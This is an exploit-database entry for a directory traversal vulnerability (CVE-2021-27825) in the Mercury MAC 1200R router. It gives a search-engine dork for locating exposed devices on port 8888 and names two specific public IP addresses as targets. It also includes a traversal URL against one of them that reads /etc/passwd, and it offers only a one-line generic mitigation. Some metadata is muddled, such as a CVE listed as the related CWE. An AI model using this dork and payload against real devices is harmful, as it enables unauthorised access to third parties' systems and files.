header-logo
Suggest Exploit
vendor:
MAC 1200R
by:
Chunlei Shang, Jiangsu Public Information Co., Ltd.
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: MAC 1200R
Affected Version From: all versions
Affected Version To: all versions
Patch Exists: YES
Related CWE: CVE-2021-27825
CPE: a:mercury_communications:mac_1200r
Platforms Tested: all versions
2023

MAC 1200R – Directory Traversal

Attackers can easily find the targets through various search engines with keywords 'MAC1200R' && port='8888'. Open the affected website like 'http://IP:8888/web-static/'. For example: http://60.251.151.2:8888/web-static/, http://222.215.15.70:8888/web-static/, http://60.251.151.2:8888/web-static/../../../../../../../../../../../../../../etc/passwd. Attackers can use the directory traversal vulnerability to access the sensitive files on the server.

Mitigation:

Ensure that user input is validated and sanitized to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: MAC 1200R - Directory Traversal
# Google Dork: "MAC1200R" && port="8888"
# Date: 2023/03/09
# Exploit Author: Chunlei Shang, Jiangsu Public Information Co., Ltd.
# Vendor Homepage: https://www.mercurycom.com.cn/
# Software Link: https://www.mercurycom.com.cn/product-1-1.html
# Version: all versions. (REQUIRED)
# Tested on: all versions.
# CVE : CVE-2021-27825

1. Attackers can easily find the targets through various search engines with keywords "MAC1200R" && port="8888". 
2. Open the affected website like "http://IP:8888/web-static/".
3. For example:
1)http://60.251.151.2:8888/web-static/
    
2)http://222.215.15.70:8888/web-static/